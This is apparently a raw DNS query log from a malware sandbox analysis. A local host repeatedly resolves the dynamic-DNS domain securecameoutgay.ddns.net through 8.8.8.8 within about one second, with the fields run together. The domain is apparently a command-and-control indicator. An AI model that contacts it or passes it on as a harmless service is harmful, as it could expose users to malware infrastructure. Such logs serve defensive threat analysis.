                                                    Oct 12, 2024 23:05:55.282978058 CEST192.168.2.148.8.8.80xf7daStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.289808035 CEST192.168.2.148.8.8.80xf7daStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.296514988 CEST192.168.2.148.8.8.80x6a44Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.303283930 CEST192.168.2.148.8.8.80x6a44Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.309952021 CEST192.168.2.148.8.8.80x6a44Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.316503048 CEST192.168.2.148.8.8.80x6a44Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.323384047 CEST192.168.2.148.8.8.80x6a44Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.329833984 CEST192.168.2.148.8.8.80x3c50Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.336399078 CEST192.168.2.148.8.8.80x3c50Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.343127966 CEST192.168.2.148.8.8.80x3c50Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.349656105 CEST192.168.2.148.8.8.80x3c50Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.356436014 CEST192.168.2.148.8.8.80x3c50Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.363163948 CEST192.168.2.148.8.8.80xd76fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.369927883 CEST192.168.2.148.8.8.80xd76fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.376599073 CEST192.168.2.148.8.8.80xd76fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.383409977 CEST192.168.2.148.8.8.80xd76fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.390135050 CEST192.168.2.148.8.8.80xd76fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.397119045 CEST192.168.2.148.8.8.80xaf62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.403795958 CEST192.168.2.148.8.8.80xaf62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.410617113 CEST192.168.2.148.8.8.80xaf62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.417311907 CEST192.168.2.148.8.8.80xaf62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.424376965 CEST192.168.2.148.8.8.80xaf62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.431271076 CEST192.168.2.148.8.8.80xb193Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.437997103 CEST192.168.2.148.8.8.80xb193Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.444581032 CEST192.168.2.148.8.8.80xb193Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.451648951 CEST192.168.2.148.8.8.80xb193Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.458509922 CEST192.168.2.148.8.8.80xb193Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.466576099 CEST192.168.2.148.8.8.80xfc46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.473602057 CEST192.168.2.148.8.8.80xfc46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.480017900 CEST192.168.2.148.8.8.80xfc46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.486789942 CEST192.168.2.148.8.8.80xfc46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.493558884 CEST192.168.2.148.8.8.80xfc46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.500457048 CEST192.168.2.148.8.8.80x878aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.507381916 CEST192.168.2.148.8.8.80x878aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.513814926 CEST192.168.2.148.8.8.80x878aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.520767927 CEST192.168.2.148.8.8.80x878aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.527452946 CEST192.168.2.148.8.8.80x878aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.534538031 CEST192.168.2.148.8.8.80x31a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.541484118 CEST192.168.2.148.8.8.80x31a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.548280954 CEST192.168.2.148.8.8.80x31a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.554925919 CEST192.168.2.148.8.8.80x31a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.561453104 CEST192.168.2.148.8.8.80x31a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.568484068 CEST192.168.2.148.8.8.80xf28dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.575129032 CEST192.168.2.148.8.8.80xf28dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.581880093 CEST192.168.2.148.8.8.80xf28dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.588748932 CEST192.168.2.148.8.8.80xf28dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.595436096 CEST192.168.2.148.8.8.80xf28dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.602390051 CEST192.168.2.148.8.8.80xbe0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.609483957 CEST192.168.2.148.8.8.80xbe0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.617573977 CEST192.168.2.148.8.8.80xbe0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.624269962 CEST192.168.2.148.8.8.80xbe0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.631124020 CEST192.168.2.148.8.8.80xbe0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.637962103 CEST192.168.2.148.8.8.80x9366Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.644812107 CEST192.168.2.148.8.8.80x9366Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.652411938 CEST192.168.2.148.8.8.80x9366Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.659406900 CEST192.168.2.148.8.8.80x9366Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.666069984 CEST192.168.2.148.8.8.80x9366Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.672779083 CEST192.168.2.148.8.8.80xc234Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.680584908 CEST192.168.2.148.8.8.80xc234Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.688914061 CEST192.168.2.148.8.8.80xc234Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.695971012 CEST192.168.2.148.8.8.80xc234Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.702748060 CEST192.168.2.148.8.8.80xc234Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.709661007 CEST192.168.2.148.8.8.80x2248Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.716439009 CEST192.168.2.148.8.8.80x2248Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.723455906 CEST192.168.2.148.8.8.80x2248Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.730469942 CEST192.168.2.148.8.8.80x2248Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.737046003 CEST192.168.2.148.8.8.80x2248Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.743688107 CEST192.168.2.148.8.8.80x251Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.750549078 CEST192.168.2.148.8.8.80x251Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.756887913 CEST192.168.2.148.8.8.80x251Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.763788939 CEST192.168.2.148.8.8.80x251Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.770905018 CEST192.168.2.148.8.8.80x251Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.777765989 CEST192.168.2.148.8.8.80xafeeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.784658909 CEST192.168.2.148.8.8.80xafeeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.791191101 CEST192.168.2.148.8.8.80xafeeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.797952890 CEST192.168.2.148.8.8.80xafeeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.804640055 CEST192.168.2.148.8.8.80xafeeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.811408043 CEST192.168.2.148.8.8.80x2c3cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.818506956 CEST192.168.2.148.8.8.80x2c3cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.825325012 CEST192.168.2.148.8.8.80x2c3cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.832412958 CEST192.168.2.148.8.8.80x2c3cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.839211941 CEST192.168.2.148.8.8.80x2c3cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.846482038 CEST192.168.2.148.8.8.80xfc1bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.853189945 CEST192.168.2.148.8.8.80xfc1bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.860060930 CEST192.168.2.148.8.8.80xfc1bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.867074966 CEST192.168.2.148.8.8.80xfc1bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.873904943 CEST192.168.2.148.8.8.80xfc1bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.880603075 CEST192.168.2.148.8.8.80xba4aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.887213945 CEST192.168.2.148.8.8.80xba4aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.894115925 CEST192.168.2.148.8.8.80xba4aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.901164055 CEST192.168.2.148.8.8.80xba4aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.907538891 CEST192.168.2.148.8.8.80xba4aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.914536953 CEST192.168.2.148.8.8.80xfa43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.921413898 CEST192.168.2.148.8.8.80xfa43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.927791119 CEST192.168.2.148.8.8.80xfa43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.934669018 CEST192.168.2.148.8.8.80xfa43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.941652060 CEST192.168.2.148.8.8.80xfa43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.948841095 CEST192.168.2.148.8.8.80xceebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.955710888 CEST192.168.2.148.8.8.80xceebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.962460995 CEST192.168.2.148.8.8.80xceebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.969598055 CEST192.168.2.148.8.8.80xceebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.976469040 CEST192.168.2.148.8.8.80xceebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.983257055 CEST192.168.2.148.8.8.80xcab3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.990015984 CEST192.168.2.148.8.8.80xcab3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.996793985 CEST192.168.2.148.8.8.80xcab3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.003793001 CEST192.168.2.148.8.8.80xcab3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.011212111 CEST192.168.2.148.8.8.80xcab3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.017978907 CEST192.168.2.148.8.8.80xdf1eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.024570942 CEST192.168.2.148.8.8.80xdf1eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.031344891 CEST192.168.2.148.8.8.80xdf1eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.038422108 CEST192.168.2.148.8.8.80xdf1eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.045290947 CEST192.168.2.148.8.8.80xdf1eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.051966906 CEST192.168.2.148.8.8.80x8117Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.058777094 CEST192.168.2.148.8.8.80x8117Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.065833092 CEST192.168.2.148.8.8.80x8117Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.072890997 CEST192.168.2.148.8.8.80x8117Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.079715014 CEST192.168.2.148.8.8.80x8117Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.086298943 CEST192.168.2.148.8.8.80x88dcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.093379021 CEST192.168.2.148.8.8.80x88dcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.100311995 CEST192.168.2.148.8.8.80x88dcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.107096910 CEST192.168.2.148.8.8.80x88dcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.113713980 CEST192.168.2.148.8.8.80x88dcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.120682955 CEST192.168.2.148.8.8.80xbd12Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.127427101 CEST192.168.2.148.8.8.80xbd12Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.134181023 CEST192.168.2.148.8.8.80xbd12Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.140873909 CEST192.168.2.148.8.8.80xbd12Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.147957087 CEST192.168.2.148.8.8.80xbd12Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.155023098 CEST192.168.2.148.8.8.80xd5d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.161680937 CEST192.168.2.148.8.8.80xd5d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.168467999 CEST192.168.2.148.8.8.80xd5d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.175338030 CEST192.168.2.148.8.8.80xd5d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.182192087 CEST192.168.2.148.8.8.80xd5d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.188977957 CEST192.168.2.148.8.8.80xf015Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.195725918 CEST192.168.2.148.8.8.80xf015Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.202517033 CEST192.168.2.148.8.8.80xf015Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.209204912 CEST192.168.2.148.8.8.80xf015Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.216032028 CEST192.168.2.148.8.8.80xf015Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.223037958 CEST192.168.2.148.8.8.80x3dedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.229506969 CEST192.168.2.148.8.8.80x3dedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.236231089 CEST192.168.2.148.8.8.80x3dedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.242993116 CEST192.168.2.148.8.8.80x3dedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.250274897 CEST192.168.2.148.8.8.80x3dedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.257380962 CEST192.168.2.148.8.8.80x4a69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.264497042 CEST192.168.2.148.8.8.80x4a69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.271105051 CEST192.168.2.148.8.8.80x4a69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.277995110 CEST192.168.2.148.8.8.80x4a69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.285161972 CEST192.168.2.148.8.8.80x4a69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.292311907 CEST192.168.2.148.8.8.80xa267Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.299036980 CEST192.168.2.148.8.8.80xa267Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.305846930 CEST192.168.2.148.8.8.80xa267Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.313005924 CEST192.168.2.148.8.8.80xa267Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.319808960 CEST192.168.2.148.8.8.80xa267Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.326917887 CEST192.168.2.148.8.8.80x441bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.334486961 CEST192.168.2.148.8.8.80x441bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.341361046 CEST192.168.2.148.8.8.80x441bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.349109888 CEST192.168.2.148.8.8.80x441bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.360685110 CEST192.168.2.148.8.8.80x441bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.372122049 CEST192.168.2.148.8.8.80x689Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.379451036 CEST192.168.2.148.8.8.80x689Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.386445045 CEST192.168.2.148.8.8.80x689Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.393306971 CEST192.168.2.148.8.8.80x689Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.400150061 CEST192.168.2.148.8.8.80x689Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.408859968 CEST192.168.2.148.8.8.80xc64aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.416203022 CEST192.168.2.148.8.8.80xc64aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.423187017 CEST192.168.2.148.8.8.80xc64aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.432074070 CEST192.168.2.148.8.8.80xc64aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.438914061 CEST192.168.2.148.8.8.80xc64aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.446433067 CEST192.168.2.148.8.8.80x826dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.452945948 CEST192.168.2.148.8.8.80x826dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.460247040 CEST192.168.2.148.8.8.80x826dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.467988968 CEST192.168.2.148.8.8.80x826dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.474543095 CEST192.168.2.148.8.8.80x826dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.481770039 CEST192.168.2.148.8.8.80x66d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.488641977 CEST192.168.2.148.8.8.80x66d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.495420933 CEST192.168.2.148.8.8.80x66d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.502269983 CEST192.168.2.148.8.8.80x66d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.509179115 CEST192.168.2.148.8.8.80x66d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.516501904 CEST192.168.2.148.8.8.80x2858Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.523478031 CEST192.168.2.148.8.8.80x2858Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.530400038 CEST192.168.2.148.8.8.80x2858Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.537252903 CEST192.168.2.148.8.8.80x2858Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.544135094 CEST192.168.2.148.8.8.80x2858Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.552753925 CEST192.168.2.148.8.8.80xe2c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.559638977 CEST192.168.2.148.8.8.80xe2c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.566319942 CEST192.168.2.148.8.8.80xe2c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.576541901 CEST192.168.2.148.8.8.80xe2c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.583009958 CEST192.168.2.148.8.8.80xe2c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.589777946 CEST192.168.2.148.8.8.80x7ba8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
